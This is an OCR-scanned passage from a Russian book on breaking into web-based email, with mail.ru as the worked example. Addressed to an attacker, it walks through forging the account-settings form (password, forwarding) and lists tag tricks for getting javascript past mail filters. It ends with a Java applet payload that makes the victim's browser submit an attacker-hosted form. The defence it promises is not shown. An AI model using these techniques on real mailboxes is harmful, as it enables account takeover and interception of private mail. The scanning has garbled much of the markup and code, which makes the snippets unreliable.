Раздел: Документация

0 ... 42 43 44 45 46 47 48 ... 169

сов и печальный пример MS Outlook и MS Outlook Express 5.

Первые два аргумента, похоже, соответствуют действительности, а о безопасности поговорим чуть ниже.

В главе будет рассмотрен один из вариантов технического подхода к вскрытию почтового ящика, основанного на совместном использовании недоработок современных браузеров, принципиальных недостатках CGI и ошибках в политике безопасности почтовых служб. Именно он чаще всего применяется в атаках на Web-почту. Для «конкретности» будет описанавтором метод «захвата» или «подслушивания» пользователя популярной в России системы mail.ru

и способ защиты.

«Социальная инженерия» как вид взлома (сравнимый по эффективности) рассматриваться не будет просто потому, что она детально рассмотрена в главах других авторов

Существуют, конечно, и другие методы, возможно, лучшие, чем описанный ниже.

Принципиальные недостатки безопасности WWW-почты

Надежность обычной почтовой программы определяется (без) грамотностью ее написания.

Браузер же как система прочтения почты изначально недостаточно безопасен, поэтому создатели почты вынуждены налагать ограничения на теги, используемые в письмах (<script ...>, <iframe> и т.д.). Как правило, встроенный фильтр просто удаляет «небезопасные», с его точки зрения, инструкции. Принципиальных недостатков у подобного подхода два:

1. слишком строгие фильтры могут повредить само письмо;

трудно предугадать заранее, на что способна безопасная с виду конструкция.

Тем не менее, именно на фильтрации основаны большинство существующих почтовых систем.

Самый же уязвимый элемент — это способ задания пользовательских настроек и пароля. Они, как правило, задаются с помощью CGI-форм (как наиболее распространенного стандарта) по тем же каналам, что используются для работы с почтой, и могут быть вызваны любым членом сети, сумевшим подделать ip и cookies пользователя, или (что гораздо проще) временно захватившим контроль над браузером.

137

---

Технологи} атаки

Итак, вы решили перехватить контроль у пользователя хххх почтовой системы с Web-интерфейсом, например, yyyy.zz. Только убедитесь, что он действительно пользуется Web-интерфейсом, а не читает почту через рорЗ-сервер или пользуется форвардингом.

Заводим почтовый ящик на этом же сервере и в первую очередь смотрим, как задаются и изменяются пароль и прочие настройки. На mail.ru (и многих других) это делает обычная форма, результаты заполнения которой передаются в

fy

Для идентификации пользователя, похоже, используется скрытое поле

<input type=»hidden» name=»Usemame» value-»intstl»> Вам предоставляется возможность изменить:

—имя пользователя;

<input type-»text» nanie-»RcalName» value->PUPKIN*->

адрес пересылкии возможность сохранения почты при

этом;

<inputtype-»text» name-»Forward* value-»..» <input type-checkbox name=»Flags.DoNotKeepMail» >

-пароль;

<inputtype-»password»name-* Password*

<input typc-*password* name-*Password Verify*

Попробуем сформировать соответствующий файл, задав в скрытом поле имя интересующего нас пользователя и отослать форму, т. к. CGI, увы, не проверяет место нахождения формы-запроса.

<form method-post

action=»http://koi.mail.ru/cgi-bin/modiryuser?modify»>

Не получилось. Быть может, в интересующей вас системе этого окажется достаточно, а в mail.ru такие шутки не проходят. Значит,

138

I

---

пользователь идентифицируется с помощью cookies или, хуже того, ip. Пробуем вручную отредактировать cookies — результат тот же. Следовательно, эту форму должен отослать сам пользователь. Наиболее простой способ захвата контроля над браузером — внедрение <script> и &{ ... } конструкций в письмо — давно уже пресечен с помощью фильтров почти всеми, и mail.ru в том числе. Тем не менее попробуйте, чем черт не шутит. Если теги разрешены, то фильтрация самого javascript иногда может быть обойдена при помощи средств динамической генерации кода.

Неплохой результат иногда дают конструкции вида

<тег[XXJSRC-.. .>,например,<IMAGE

LoSrc=»javascript.......> , <IFRAME SCR=»about:

<script...> ..,»> для IE и <ilayer src=images-3/»mocha: . . . »> для NC.

(«mocha» - это старый, всеми позабытый аналог модификатора «javascript», сохранившийся в NC).

Вообще, чем реже используется тот или иной тег, тем больше вероятность, что разработчики забыли его отфильтровать... Недостаток

этого подхода в том, что требуется знать тип и версию используемого

браузера.

К сожалению (вернее к счастью), у программистов mail.ru память хорошая. В конце концов это их и подвело. Наверное, они (да и не только они, похоже) читали «умные» книжки, запомнив, что Java -

одна из самых безопасных технологий в сети. Поэтому и разрешили

тег <Applet...>.

В стандарте Java есть класс AppletContextпозволяю-

щий нам открывать новые окна или менять текущие.

URL myURL=new URL<«http:...editprofil.html»); getAppletContext().showDocument(myURL, » self»); getAppletContext().showDocument(myURL,»newwin»).

На любой общедоступной страничке размещаем файл editpro-

fil.html (содержащий требуемую форму), прописываем к нему путь в апплете, который размещаем там же и высылаем пользователю письмо, содержащее вызов апплета. Этот экс плоит не зависит от браузера, одинаково «хорошо» работая в IE и NC. (Не забудьте отредактировать ПУТЬ ).

139

0 ... 42 43 44 45 46 47 48 ... 169